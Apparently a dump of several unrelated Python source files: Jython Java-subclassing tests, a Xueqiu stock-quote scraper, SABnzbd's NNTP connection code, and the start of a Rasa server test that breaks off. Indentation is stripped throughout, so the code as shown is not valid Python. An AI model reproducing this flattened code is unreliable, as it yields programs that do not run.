0ouuZaaHR3mTPtqwfXRgE9y/Q+gZb3SS5X60To8q06LPHwiYskAmxN1hFjMSYyd5gpIHrDsT3sU9
5IgZF4wuhCBzpnG9Ru/+AF4RJn8=
""".decode('base64').decode('zlib')
class AbstractOnSyspathTest(unittest.TestCase):
'''Subclasses an abstract class that isn't on the startup classpath.
Checks for http://jython.org/bugs/1861985
'''
def setUp(self):
out = open('Abstract.class', 'wb')
out.write(ABSTRACT_CLASS)
out.close()
self.orig_syspath = sys.path[:]
sys.path.append('')
def tearDown(self):
os.unlink('Abstract.class')
sys.path = self.orig_syspath
def test_can_subclass_abstract(self):
import Abstract
class A(Abstract):
def method(self):
pass
A()
"""
public abstract class ContextAbstract {
public ContextAbstract() {
method();
}
public abstract void method();
}
"""
# The following is the corresponding bytecode for ContextAbstract compiled with javac 1.5
# Needs to be named differently than Abstract above so the class loader won't just use it
CONTEXT_ABSTRACT = """\
eJxdTsEOwVAQnK2n1aq2Bz/ghgNxF4lInIQDcX9tX6jQJvWI33IhcfABPkrs69EedjKzM7v7+b7e
AEaIPAj4HmpoOQgchAR7nOWZnhBq3d6WIGZFqgjhIsvV8nKKVbmR8ZEV+6T0vkgJ3rq4lImaZ0Zt
z4pcq5uexmddykQPDvIqfdRh+3Bh86I/AyEyluFR5rvhKj6oRIsO/yNgygKZLHeHWY+RGN3+E9R/
wLozITS4BxwxdsHYgBBkrlVTr9KbP6qaLFc=
""".decode('base64').decode('zlib')
class ContextClassloaderTest(unittest.TestCase):
'''Classes on the context classloader should be importable and subclassable.
http://bugs.jython.org/issue1216'''
def setUp(self):
self.orig_context = Thread.currentThread().contextClassLoader
class AbstractLoader(ClassLoader):
def __init__(self):
ClassLoader.__init__(self)
c = self.super__defineClass("ContextAbstract", CONTEXT_ABSTRACT, 0,
len(CONTEXT_ABSTRACT), ClassLoader.protectionDomain)
self.super__resolveClass(c)
Thread.currentThread().contextClassLoader = AbstractLoader()
def tearDown(self):
Thread.currentThread().contextClassLoader = self.orig_context
def test_can_subclass_abstract(self):
import ContextAbstract
called = []
class A(ContextAbstract):
def method(self):
called.append(True)
A()
self.assertEquals(len(called), 1)
class MetaClass(type):
def __new__(meta, name, bases, d):
# Insert the method to be called from Java
def call(self):
return self.x
d["call"] = call
d["foo"] = 99
return super(MetaClass, meta).__new__(meta, name, bases, d)
class MetaBase(object):
__metaclass__ = MetaClass
class MetaClassTest(unittest.TestCase):
def test_java_with_metaclass_base(self):
"""Java classes can be mixed with Python bases using metaclasses"""
# Permute mixin order
class Bar(MetaBase, Callable):
def __init__(self, x):
self.x = x
class Baz(Callable, MetaBase):
def __init__(self, x):
self.x = x
# Go through {bar|baz}.call indirectly through a Java path,
# just to ensure this mixin provided by the metaclass is available
pool = Executors.newSingleThreadExecutor()
bar = Bar(42)
self.assertEqual(bar.foo, 99)
self.assertEqual(42, pool.submit(bar).get())
baz = Baz(47)
self.assertEqual(baz.foo, 99)
self.assertEqual(47, pool.submit(baz).get())
pool.shutdown()
class AbstractMethodTest(unittest.TestCase):
def test_abstract_method_implemented(self):
class C(AbstractList):
def get(self, index):
return index * 2
def size(self):
return 7
c = C()
self.assertEqual(c.size(), 7)
self.assertEqual([c.get(i) for i in xrange(7)], range(0, 14, 2))
def test_abstract_method_not_implemented(self):
class C(AbstractList):
def size(self):
return 47
# note that unlike ABCs in Python - or partial extensions
# of abstract classes in Java - we allow such classes to
# be instantiated. We may wish to change this in Jython
# 3.x
c = C()
self.assertEqual(c.size(), 47)
msg = r"^'C' object does not implement abstract method 'get' from 'java.util.AbstractList'$"
with self.assertRaisesRegexp(NotImplementedError, msg):
C().get(42)
def test_concrete_method(self):
class H(HashSet):
def __init__(self):
self.added = 0
HashSet.__init__(self)
def add(self, value):
self.added += 1
HashSet.add(self, value)
h = H()
h.add(42)
h.add(47)
h.discard(47)
self.assertEqual(list(h), [42])
self.assertEqual(h.added, 2)
def test_interface_method_implemented(self):
class C(Callable):
def call(self):
return 42
self.assertEqual(C().call(), 42)
def test_interface_method_not_implemented(self):
class C(Callable):
pass
msg = r"^'C' object does not implement abstract method 'call' from 'java.util.concurrent.Callable'$"
with self.assertRaisesRegexp(NotImplementedError, msg):
C().call()
class SuperIsSuperTest(unittest.TestCase):
# Testing how the vision described in Raymond Hettinger's blog
# https://rhettinger.wordpress.com/2011/05/26/super-considered-super/
# - super in Python is really next-method - can be merged with
# Java's super, which is a conventional super that dispatches up
# the class inheritance hierarchy
def test_super_dispatches_through_proxy(self):
# Verify fix for http://bugs.jython.org/issue1540
class MyList(ArrayList):
def get(self, index):
return super(MyList, self).get(index)
def toString(self):
return "MyList<<<" + super(MyList, self).toString() + ">>>"
my_list = MyList([0, 1, 2, 3, 4, 5])
self.assertEqual(my_list.get(5), 5)
self.assertEqual(
str(my_list),
"MyList<<<[0, 1, 2, 3, 4, 5]>>>")
self.assertEqual(my_list.size(), 6)
class HierarchyTest(unittest.TestCase):
# Attempt to expand upon the inheritance hierarchy described as
# being a bug in http://bugs.jython.org/issue2104, but this test
# currently only confirms existing behavior.
def assertB(self, b2, level, cls):
self.assertIsInstance(b2, cls)
self.assertEqual(b2.whoAmI(), level)
self.assertEqual(b2.staticWhoAmI(), level)
self.assertEqual(b2.root(), "A")
self.assertEqual(b2.staticRoot(), "A")
self.assertEqual(b2.everyOther(), "A")
self.assertEqual(b2.notInAbstract(), "B")
def test_b(self):
b = InheritanceB()
self.assertB(b.replicateMe(), "B", InheritanceB)
self.assertB(b.build(), "B", InheritanceB)
with self.assertRaises(UnsupportedOperationException):
b.replicateParent()
with self.assertRaises(UnsupportedOperationException):
b.buildParent()
def assertC(self, c2, level, cls):
self.assertIsInstance(c2, cls)
self.assertEqual(c2.whoAmI(), level)
self.assertEqual(c2.staticWhoAmI(), level)
self.assertEqual(c2.root(), "A")
self.assertEqual(c2.staticRoot(), "A")
self.assertEqual(c2.everyOther(),
"C" if isinstance(c2, InheritanceC) else "A")
self.assertEqual(c2.notInAbstract(), "B")
def test_c(self):
c = InheritanceC()
self.assertC(c.replicateMe(), "C", InheritanceC)
self.assertC(c.replicateParent(), "B", InheritanceB)
self.assertC(c.build(), "C", InheritanceC)
self.assertC(c.buildParent(), "B", InheritanceB)
def assertD(self, d2, level, cls):
self.assertIsInstance(d2, cls)
self.assertEqual(d2.whoAmI(), level)
self.assertEqual(d2.staticWhoAmI(), level)
self.assertEqual(d2.root(), "A")
self.assertEqual(d2.staticRoot(), "A")
self.assertEqual(d2.everyOther(), "C")
self.assertEqual(d2.notInAbstract(), "B")
def test_d(self):
d = InheritanceD()
self.assertD(d.replicateMe(), "D", InheritanceD)
self.assertD(d.replicateParent(), "C", InheritanceC)
self.assertD(d.build(), "D", InheritanceD)
self.assertD(d.buildParent(), "C", InheritanceC)
def assertE(self, e2, level, cls, tested):
self.assertIsInstance(e2, cls)
self.assertEqual(e2.whoAmI(), level)
self.assertEqual(e2.staticWhoAmI(), level)
self.assertEqual(e2.root(), "A")
self.assertEqual(e2.staticRoot(), "A")
self.assertEqual(e2.everyOther(),
"E" if isinstance(e2, tested) else "C")
self.assertEqual(e2.notInAbstract(), "B")
def test_e(self):
class E(InheritanceD):
def replicateMe(self):
return E()
def replicateParent(self):
return InheritanceD()
@staticmethod
def build():
return E()
@staticmethod
def buildParent():
return InheritanceD()
def whoAmI(self):
return "E"
@staticmethod
def staticWhoAmI():
return "E"
def everyOther(self):
return "E"
e = E()
self.assertE(e.replicateMe(), "E", E, E)
self.assertE(e.replicateParent(), "D", InheritanceD, E)
self.assertE(e.build(), "E", E, E)
self.assertE(e.buildParent(), "D", InheritanceD, E)
class ChooseCorrectToJavaTest(unittest.TestCase):
# Verifies fix for http://bugs.jython.org/issue1795
#
# Note that we use threading.Thread because we have imported
# java.lang.Thread as Thread
def test_extended_thread(self):
class ExtendedThread(threading.Thread, ExtendedInterface):
def returnSomething(self):
return "yo yo yo"
result = [None]
def f(r):
r[0] = 47
t = ExtendedThread(target=f, args=(result,))
self.assertEqual(
UseExtendedInterface().countWords(t),
3)
# Also verify that t still works as a regular thread
t.start()
t.join()
self.assertFalse(t.isAlive())
self.assertEqual(result[0], 47)
def test_interruption(self):
# based on this code http://www.jython.org/jythonbook/en/1.0/Concurrency.html#interruption,
# which demonstrates __tojava__ works properly
class ExtendedThread(threading.Thread, ExtendedInterface):
def returnSomething(self):
return "yo yo yo"
def wait_until_interrupted(cv):
with cv:
while not Thread.currentThread().isInterrupted():
try:
# this condition variable is never notified, so will only
# succeed if interrupted
cv.wait()
except InterruptedException, e:
break
unfair_condition = threading.Condition()
threads = [
ExtendedThread(
name="thread #%d" % i,
target=wait_until_interrupted,
args=(unfair_condition,))
for i in xrange(5)]
for thread in threads:
thread.start()
for thread in threads:
Thread.interrupt(thread)
for thread in threads:
thread.join(5)
# this assertion only succeeds if threads terminated because
# they were interrupted
for thread in threads:
self.assertFalse(thread.isAlive())
class OldAndNewStyleInitSuperTest(unittest.TestCase):
"""
http://bugs.jython.org/issue2375
"""
def test_new_style_init(self):
class AModel(DefaultTreeModel):
def __init__(self):
super(AModel, self).__init__(DefaultMutableTreeNode())
AModel()
def test_old_style_init(self):
class AModel(DefaultTreeModel):
def __init__(self):
DefaultTreeModel.__init__(self, DefaultMutableTreeNode())
AModel()
def test_main():
test_support.run_unittest(
InterfaceTest,
TableModelTest,
AutoSuperTest,
PythonSubclassesTest,
AbstractOnSyspathTest,
ContextClassloaderTest,
MetaClassTest,
AbstractMethodTest,
SuperIsSuperTest,
OldAndNewStyleInitSuperTest,
HierarchyTest,
ChooseCorrectToJavaTest)
if __name__ == '__main__':
test_main()
|
Xueqiu.py
|
# -*- coding: utf-8 -*-
"""
Xueqiu community API class
Created on 03/17/2016
@author: Wen Gu
@contact: emptyset110@gmail.com
"""
# The following section is auto-generated #
# --- Import system configuration
import dHydra.core.util as util
from dHydra.core.Vendor import Vendor
from dHydra.core.Functions import get_vendor
# --- Import custom configuration
from .connection import *
from .const import *
from .config import *
# End of auto-generated section #
import pytz
import requests
import asyncio
from pandas import DataFrame
import pandas
from datetime import datetime, timedelta
import functools
import threading
import pymongo
import time
class Xueqiu(Vendor):
def __init__(self):
super().__init__()
self.session = requests.Session()
# Hit the Xueqiu quote page once first to obtain session cookies
xq = self.session.get(
"https://xueqiu.com/hq", headers=HEADERS_XUEQIU
)
self.mongodb = None
def login(self, cfg_path=None):
import os
import hashlib
if cfg_path is None:
cfg = util.read_config(os.getcwd() + "/config.json")
else:
cfg = util.read_config(cfg_path)
username = cfg["xueqiuUsername"]
pwd = cfg["xueqiuPassword"].encode("utf8")
pwd = hashlib.md5(pwd).hexdigest().upper()
res = self.session.post(url=URL_XUEQIU_LOGIN, data=DATA_XUEQIU_LOGIN(
username, pwd), headers=HEADERS_XUEQIU)
res_json = res.json()
if "error_code" in res_json:
self.logger.warning("{}".format(res_json))
return res_json
"""
stockTypeList : list
['sha','shb','sza','szb'] stand for Shanghai A, Shanghai B, Shenzhen A and Shenzhen B shares respectively. If empty, all Shanghai/Shenzhen A and B shares are fetched.
e.g.: stockTypeList = ['sha','shb'] fetches all Shanghai A and Shanghai B shares
columns : string
Defaults to: "symbol,name,current,chg,percent,last_close,open,high,low,volume,amount,market_capital,pe_ttm,high52w,low52w,hasexist"
"""
def get_stocks(
self,
stockTypeList=['sha', 'shb', 'sza', 'szb'],
columns=CONST_XUEQIU_QUOTE_ORDER_COLUMN
):
for stockType in stockTypeList:
print("正在从雪球获取:{}".format(EX_NAME[stockType]))
page = 1
while True:
response = self.session.get(
URL_XUEQIU_QUOTE_ORDER(page, columns, stockType),
headers=HEADERS_XUEQIU
).json()
df = DataFrame.from_records(
response["data"], columns=response["column"])
if 'stocks' not in locals().keys():
stocks = df
else:
stocks = stocks.append(df)
if df.size == 0:
break
page += 1
return stocks
def get_symbols(
self,
stockTypeList=['sha', 'shb', 'sza', 'szb']
):
"""
Returns: set
"""
symbols = self.get_stocks(
stockTypeList=stockTypeList,
columns='symbol'
)
return set(symbols.symbol)
"""
Interface for fetching quotes / fundamentals from Xueqiu
"""
def get_quotation(self, symbol=None, symbolSet=None, dataframe=True, threadNum=3):
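# Split the symbol list across threadNum threads; each thread runs its own asyncio
# event loop and fetches quotes in batches of 50 symbols per request, merging the
# results into self.quotation.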
if 'quotation' in self.__dict__.keys():
del(self.quotation)
# Cut symbolList
symbolList = list(symbolSet)
threads = []
symbolListSlice = util.slice_list(num=threadNum, data_list=symbolList)
for symbolList in symbolListSlice:
loop = asyncio.new_event_loop()
symbolsList = util.slice_list(step=50, data_list=symbolList)
tasks = [self.get_quotation_task(
symbols=symbols) for symbols in symbolsList]
t = threading.Thread(target=util.thread_loop, args=(loop, tasks))
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
if dataframe:
self.quotation = DataFrame.from_records(self.quotation).T
return(self.quotation)
@asyncio.coroutine
def get_quotation_task(self, symbols):
symbols = util.symbols_to_string(symbols)
quotation = yield from self.fetch_quotation_coroutine(symbols=symbols)
if 'quotation' not in self.__dict__.keys():
self.quotation = quotation
else:
self.quotation.update(quotation)
"""
Coroutine for fetching per-symbol fundamentals from Xueqiu
"""
@asyncio.coroutine
def fetch_quotation_coroutine(self, symbols=None):
loop = asyncio.get_event_loop()
if symbols is not None:
async_req = loop.run_in_executor(
None,
functools.partial(
self.session.get,
URL_XUEQIU_QUOTE(symbols),
headers=HEADERS_XUEQIU
)
)
try:
quotation = yield from async_req
except Exception as e:
print(e)
async_req = loop.run_in_executor(
None,
functools.partial(
self.session.get,
URL_XUEQIU_QUOTE(symbols),
headers=HEADERS_XUEQIU
)
)
quotation = yield from async_req
quotation = quotation.json()
return(quotation)
# """
# Fetch per-symbol fundamentals from Xueqiu
# Returns a dict by default; returns a DataFrame if the dataframe argument is True
# """
# def fetch_quotation(self, symbols = None, dataframe = False):
# symbols = util.symbols_to_string(symbols)
# if symbols is not None:
# quotation = self.session.get(
# URL_XUEQIU_QUOTE(symbols)
# , headers = HEADERS_XUEQIU
# ).json()
# if dataframe:
# quotation = DataFrame.from_records( quotation ).T
# return(quotation)
"""
Xueqiu historical k-line interface, with forward/backward price adjustment (unadjusted by default)
period: 1day,1week,1month
"""
def get_kline(self, symbol, period='1day', fqType='normal', begin=None, end=None, dataframe=True):
if end is None:
end = util.time_now()
if isinstance(begin, str):
begin = util.date_to_timestamp(begin)
if isinstance(end, str):
end = util.date_to_timestamp(end)
try:
response = self.session.get(
URL_XUEQIU_KLINE(symbol=symbol, period=period, fqType=fqType, begin=begin, end=end), headers=HEADERS_XUEQIU, timeout=3
)
kline = response.json()
# time.sleep(0.5)
except Exception as e:
self.logger.warning("{}".format(e))
self.logger.info(response.text)
time.sleep(3)
return False
if kline["success"] == 'true':
if dataframe:
if (kline["chartlist"] is not None) and (kline["chartlist"] != []):
df = DataFrame.from_records(kline["chartlist"])
df["time"] = pandas.to_datetime(df["time"])
df["time"] += timedelta(hours=8)
df["symbol"] = symbol
return df
else:
return DataFrame()
else:
return kline["chartlist"]
else:
return None
"""
Store a single symbol's historical k-lines into MongoDB
"""
def kline_to_mongodb(
self,
symbol,
types=["normal", "before", "after"],
end=None,
dbName='stock',
collectionName='kline_history',
host='localhost',
port=27017
):
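# Incremental sync: for each adjustment type, resume from the day after the latest
# record already stored in MongoDB and insert only the new k-lines.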
if end is None:
end = datetime.now().date()
else:
end = util.string_to_date(end)
if self.mongodb is None:
self.mongodb = get_vendor("DB").get_mongodb(host=host, port=port)
if self.mongodb is False:
self.logger.error("没有连接上mongodb")
return False
for fqType in types:
# First look up the latest record for this symbol in MongoDB
latest = self.mongodb[dbName][collectionName].find_one(
{"symbol" : symbol, "type": fqType}, sort=[("time", -1)]
)
if latest is not None:
begin = (latest["time"] + timedelta(days=1)
).strftime("%Y-%m-%d")
self.logger.info("symbol = {}, {}\t最近更新记录为 {}".format(
symbol, fqType, latest["time"]))
if latest["time"].date() >= end:
self.logger.info("不需要更新")
return True
else:
begin = None
self.logger.info(
"symbol = {}, {}\t无最近更新记录".format(symbol, fqType))
self.logger.info("开始更新symbol = {} \t {}".format(symbol, fqType))
kline = False
while kline is False:
try:
kline = self.get_kline(symbol, begin=begin)
except Exception as e:
self.logger.warning(e)
if len(kline) > 0:
kline["type"] = fqType
kline = kline.iloc[0:len(kline)].to_dict(orient="records")
result = self.mongodb[dbName][
collectionName].insert_many(kline)
self.logger.info(
"更新完毕symbol = {} \t {} \t 插入结果:{}"
.format(symbol, fqType, result)
)
else:
self.logger.info("没有新的记录")
return True
def kline_history(
self,
symbols=None,
end=None,
types=["normal", "before", "after"],
dbName="stock",
collectionName="kline_history",
host="localhost",
port=27017
):
if symbols is None:
# Fall back to fetching a symbol list from Sina
sina = get_vendor("Sina")
symbolList = sina.get_symbols()
elif isinstance(symbols, str):
symbolList = symbols.split(',')
else:
symbolList = list(symbols)
for symbol in symbolList:
self.kline_to_mongodb(
symbol,
types=types,
end=end,
dbName=dbName,
collectionName=collectionName,
host=host,
port=port
)
return True
"""
period = '1d' intraday minute bars for the current day only
= '5d' 5-minute bars, 250 rows (at most 5 trading days)
= 'all' historical weekly bars
"""
def get_today(self, symbol, period='1day', dataframe=True):
quotation = self.session.get(
URL_XUEQIU_CHART(symbol=symbol, period=period), headers=HEADERS_XUEQIU
).json()
if quotation["success"] == "true":
if dataframe:
df = DataFrame.from_records(quotation["chartlist"])
df["time"] = pandas.to_datetime(df["time"])
df["time"] += timedelta(hours=8)
df["symbol"] = symbol
return df
else:
return quotation["chartlist"]
else:
return False
def get_combination(self, symbol):
response = self.session.get(
"https://xueqiu.com/cubes/nav_daily/all.json?cube_symbol={}&since=0&until=1469611785000"
.format(symbol),
headers=HEADERS_XUEQIU
)
print(response)
print(response.text)
"""
Xueqiu keyboard helper (symbol search)
"""
def keyboard_helper(self, symbol):
response = self.session.get(
"https://xueqiu.com/stock/search.json?code=%s&size=10&_=%s" % (
symbol, int(time.time() * 1000))
).json()["stocks"]
return response
|
newswrapper.py
|
#!/usr/bin/python3 -OO
# Copyright 2007-2021 The SABnzbd-Team <team@sabnzbd.org>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
sabnzbd.newswrapper
"""
import errno
import socket
from threading import Thread
from nntplib import NNTPPermanentError
import time
import logging
import ssl
from typing import List, Optional, Tuple, AnyStr
import sabnzbd
import sabnzbd.cfg
from sabnzbd.constants import DEF_TIMEOUT
from sabnzbd.encoding import utob
from sabnzbd.misc import nntp_to_msg, is_ipv4_addr, is_ipv6_addr, get_server_addrinfo
# Set pre-defined socket timeout
socket.setdefaulttimeout(DEF_TIMEOUT)
class NewsWrapper:
# Pre-define attributes to save memory
__slots__ = (
"server",
"thrdnum",
"blocking",
"timeout",
"article",
"data",
"nntp",
"connected",
"user_sent",
"pass_sent",
"group",
"user_ok",
"pass_ok",
"force_login",
"status_code",
)
def __init__(self, server, thrdnum, block=False):
self.server: sabnzbd.downloader.Server = server
self.thrdnum: int = thrdnum
self.blocking: bool = block
self.timeout: Optional[float] = None
self.article: Optional[sabnzbd.nzbstuff.Article] = None
self.data: List[AnyStr] = []
self.nntp: Optional[NNTP] = None
self.connected: bool = False
self.user_sent: bool = False
self.pass_sent: bool = False
self.user_ok: bool = False
self.pass_ok: bool = False
self.force_login: bool = False
self.group: Optional[str] = None
self.status_code: Optional[int] = None
def init_connect(self):
"""Setup the connection in NNTP object"""
# Server-info is normally requested by initialization of
# servers in Downloader, but not when testing servers
if self.blocking and not self.server.info:
self.server.info = get_server_addrinfo(self.server.host, self.server.port)
# Construct NNTP object
self.nntp = NNTP(self, self.server.hostip)
self.timeout = time.time() + self.server.timeout
def finish_connect(self, code: int):
"""Perform login options"""
if not (self.server.username or self.server.password or self.force_login):
self.connected = True
self.user_sent = True
self.user_ok = True
self.pass_sent = True
self.pass_ok = True
if code == 501 and self.user_sent:
# Change to a sensible text
code = 481
self.data[0] = "%d %s" % (code, T("Authentication failed, check username/password."))
self.status_code = code
self.user_ok = True
self.pass_sent = True
if code == 480:
self.force_login = True
self.connected = False
self.user_sent = False
self.user_ok = False
self.pass_sent = False
self.pass_ok = False
if code in (400, 502):
raise NNTPPermanentError(nntp_to_msg(self.data))
elif not self.user_sent:
command = utob("authinfo user %s\r\n" % self.server.username)
self.nntp.sock.sendall(command)
self.clear_data()
self.user_sent = True
elif not self.user_ok:
if code == 381:
self.user_ok = True
elif code == 281:
# No login required
self.user_ok = True
self.pass_sent = True
self.pass_ok = True
self.connected = True
if self.user_ok and not self.pass_sent:
command = utob("authinfo pass %s\r\n" % self.server.password)
self.nntp.sock.sendall(command)
self.clear_data()
self.pass_sent = True
elif self.user_ok and not self.pass_ok:
if code != 281:
# Assume that login failed (code 481 or other)
raise NNTPPermanentError(nntp_to_msg(self.data))
else:
self.connected = True
self.timeout = time.time() + self.server.timeout
def body(self):
"""Request the body of the article"""
self.timeout = time.time() + self.server.timeout
if self.article.nzf.nzo.precheck:
if self.server.have_stat:
command = utob("STAT <%s>\r\n" % self.article.article)
else:
command = utob("HEAD <%s>\r\n" % self.article.article)
elif self.server.have_body:
command = utob("BODY <%s>\r\n" % self.article.article)
else:
command = utob("ARTICLE <%s>\r\n" % self.article.article)
self.nntp.sock.sendall(command)
self.clear_data()
def send_group(self, group: str):
"""Send the NNTP GROUP command"""
self.timeout = time.time() + self.server.timeout
command = utob("GROUP %s\r\n" % group)
self.nntp.sock.sendall(command)
self.clear_data()
def recv_chunk(self, block: bool = False) -> Tuple[int, bool, bool]:
"""Receive data, return #bytes, done, skip"""
self.timeout = time.time() + self.server.timeout
while 1:
try:
if self.nntp.nw.server.ssl:
# SSL chunks come in 16K frames
# Setting higher limits results in slowdown
chunk = self.nntp.sock.recv(16384)
else:
# Get as many bytes as possible
chunk = self.nntp.sock.recv(262144)
break
except ssl.SSLWantReadError:
# SSL connections will block until they are ready.
# Either ignore the connection until it responds
# Or wait in a loop until it responds
if block:
# time.sleep(0.0001)
continue
else:
return 0, False, True
if not self.data:
try:
self.status_code = int(chunk[:3])
except:
self.status_code = None
# Append so we can do 1 join(), much faster than multiple!
self.data.append(chunk)
# Official end-of-article is ".\r\n" but sometimes it can get lost between 2 chunks
chunk_len = len(chunk)
if chunk[-5:] == b"\r\n.\r\n":
return chunk_len, True, False
elif chunk_len < 5 and len(self.data) > 1:
# We need to make sure the end is not split over 2 chunks
# This is faster than join()
combine_chunk = self.data[-2][-5:] + chunk
if combine_chunk[-5:] == b"\r\n.\r\n":
return chunk_len, True, False
# Still in middle of data, so continue!
return chunk_len, False, False
def soft_reset(self):
"""Reset for the next article"""
self.timeout = None
self.article = None
self.clear_data()
def clear_data(self):
"""Clear the stored raw data"""
self.data = []
self.status_code = None
def hard_reset(self, wait: bool = True, send_quit: bool = True):
"""Destroy and restart"""
if self.nntp:
try:
if send_quit:
self.nntp.sock.sendall(b"QUIT\r\n")
time.sleep(0.01)
self.nntp.sock.close()
except:
pass
self.nntp = None
# Reset all variables (including the NNTP connection)
self.__init__(self.server, self.thrdnum)
# Wait before re-using this newswrapper
if wait:
# Reset due to error condition, use server timeout
self.timeout = time.time() + self.server.timeout
else:
# Reset for internal reasons, just wait 5 sec
self.timeout = time.time() + 5
def __repr__(self):
return "<NewsWrapper: server=%s:%s, thread=%s, connected=%s>" % (
self.server.host,
self.server.port,
self.thrdnum,
self.connected,
)
class NNTP:
# Pre-define attributes to save memory
__slots__ = ("nw", "host", "error_msg", "sock", "fileno")
def __init__(self, nw: NewsWrapper, host):
self.nw: NewsWrapper = nw
self.host: str = host # Store the fastest ip
self.error_msg: Optional[str] = None
if not self.nw.server.info:
raise socket.error(errno.EADDRNOTAVAIL, "Address not available - Check for internet or DNS problems")
af, socktype, proto, canonname, sa = self.nw.server.info[0]
# The connection will go to self.host, so force 'af' to the matching address family
if is_ipv4_addr(self.host):
af = socket.AF_INET
if is_ipv6_addr(self.host):
af = socket.AF_INET6
# Secured or unsecured?
if not self.nw.server.ssl:
# Basic connection
self.sock = socket.socket(af, socktype, proto)
else:
# Use context or just wrapper
if sabnzbd.CERTIFICATE_VALIDATION:
# Setup the SSL socket
ctx = ssl.create_default_context()
if not sabnzbd.cfg.allow_old_ssl_tls():
# We want a modern TLS (1.2 or higher), so we disallow older protocol versions (<= TLS 1.1)
ctx.options |= ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3 | ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
# Only verify hostname when we're strict
if self.nw.server.ssl_verify < 2:
ctx.check_hostname = False
# Certificates optional
if self.nw.server.ssl_verify == 0:
ctx.verify_mode = ssl.CERT_NONE
# Did the user set a custom cipher-string?
if self.nw.server.ssl_ciphers:
# At their own risk, socket will error out in case it was invalid
ctx.set_ciphers(self.nw.server.ssl_ciphers)
self.sock = ctx.wrap_socket(socket.socket(af, socktype, proto), server_hostname=self.nw.server.host)
else:
# Use a regular wrapper, no certificate validation
self.sock = ssl.wrap_socket(socket.socket(af, socktype, proto))
# Store fileno of the socket
self.fileno: int = self.sock.fileno()
# Open the connection in a separate thread to avoid blocking
# For server-testing we do want blocking
if not self.nw.blocking:
Thread(target=self.connect).start()
else:
self.connect()
def connect(self):
"""Start of connection, can be performed a-sync"""
try:
# Wait only 15 seconds during server test
if self.nw.blocking:
self.sock.settimeout(15)
# Connect
self.sock.connect((self.host, self.nw.server.port))
self.sock.setblocking(self.nw.blocking)
# Log SSL/TLS info
if self.nw.server.ssl:
logging.info(
"%s@%s: Connected using %s (%s)",
self.nw.thrdnum,
self.nw.server.host,
self.sock.version(),
self.sock.cipher()[0],
)
self.nw.server.ssl_info = "%s (%s)" % (self.sock.version(), self.sock.cipher()[0])
# Now it's safe to add the socket to the list of active sockets
# Skip this step during server test
if not self.nw.blocking:
sabnzbd.Downloader.add_socket(self.fileno, self.nw)
except OSError as e:
self.error(e)
def error(self, error: OSError):
raw_error_str = str(error)
if "SSL23_GET_SERVER_HELLO" in str(error) or "SSL3_GET_RECORD" in raw_error_str:
error = T("This server does not allow SSL on this port")
# Catch certificate errors
if type(error) == ssl.CertificateError or "CERTIFICATE_VERIFY_FAILED" in raw_error_str:
# Log the raw message for debug purposes
logging.info("Certificate error for host %s: %s", self.nw.server.host, raw_error_str)
# Try to see if we should catch this message and provide better text
if "hostname" in raw_error_str:
raw_error_str = T(
"Certificate hostname mismatch: the server hostname is not listed in the certificate. This is a server issue."
)
elif "certificate verify failed" in raw_error_str:
raw_error_str = T("Certificate not valid. This is most probably a server issue.")
# Reformat error and overwrite str-representation
error_str = T("Server %s uses an untrusted certificate [%s]") % (self.nw.server.host, raw_error_str)
error_str = "%s - %s: %s" % (error_str, T("Wiki"), "https://sabnzbd.org/certificate-errors")
error.strerror = error_str
# Avoid logging the same error repeatedly, and don't log during a server test
if error_str not in self.nw.server.warning and not self.nw.blocking:
logging.error(error_str)
# Pass to server-test
if self.nw.blocking:
raise error
# Blocking = server-test, pass directly to display code
if self.nw.blocking:
raise socket.error(errno.ECONNREFUSED, str(error))
else:
msg = "Failed to connect: %s" % (str(error))
msg = "%s %s@%s:%s" % (msg, self.nw.thrdnum, self.host, self.nw.server.port)
self.error_msg = msg
self.nw.server.next_busy_threads_check = 0
logging.info(msg)
self.nw.server.warning = msg
def __repr__(self):
return "<NNTP: %s:%s>" % (self.host, self.nw.server.port)
|
test_server.py
|
import os
from multiprocessing.managers import DictProxy
from unittest.mock import Mock, ANY
import requests
import time
import tempfile
import uuid
from typing import List, Text, Type, Generator, NoReturn, Dict
from contextlib import ExitStack
from _pytest import pathlib
from aioresponses import aioresponses
import pytest
from freezegun import freeze_time
from mock import MagicMock
from multiprocessing import Process, Manager
import rasa
import rasa.constants
import rasa.utils.io
import rasa.server
from rasa.core import events, utils
from rasa.core.agent import Agent
from rasa.core.channels import CollectingOutputChannel, RestInput, SlackInput
from rasa.core.channels.slack import SlackBot
from rasa.core.events import Event, UserUttered, SlotSet, BotUttered
from rasa.core.trackers import DialogueStateTracker
from rasa.model import unpack_model
from rasa.nlu.constants import INTENT_NAME_KEY
from rasa.utils.endpoints import EndpointConfig
from rasa import utils as rasa_utils
from sanic import Sanic
from sanic.testing import SanicTestClient
from tests.nlu.utilities import ResponseTest
from tests.conftest import get_test_client
from ruamel.yaml import StringIO
# a couple of event instances that we can use for testing
test_events = [
Event.from_parameters(
{
"event": UserUttered.type_name,
"text": "/goodbye",
"parse_data": {
"intent": {"confidence": 1.0, INTENT_NAME_KEY: "greet"},
"entities": [],
},
}
),
BotUttered("Welcome!", {"test": True}),
SlotSet("cuisine", 34),
SlotSet("cuisine", "34"),
SlotSet("location", None),
SlotSet("location", [34, "34", None]),
]
@pytest.fixture
def rasa_app_without_api(rasa_server_without_api: Sanic) -> SanicTestClient:
return get_test_client(rasa_server_without_api)
@pytest.fixture
def rasa_app(rasa_server: Sanic) -> SanicTestClient:
return get_test_client(rasa_server)
@pytest.fixture
def rasa_app_nlu(rasa_nlu_server: Sanic) -> SanicTestClient:
return get_test_client(rasa_nlu_server)
@pytest.fixture
def rasa_app_core(rasa_core_server: Sanic) -> SanicTestClient:
return get_test_client(rasa_core_server)
@pytest.fixture
def rasa_secured_app(rasa_server_secured: Sanic) -> SanicTestClient:
return get_test_client(rasa_server_secured)
def test_root(rasa_app: SanicTestClient):
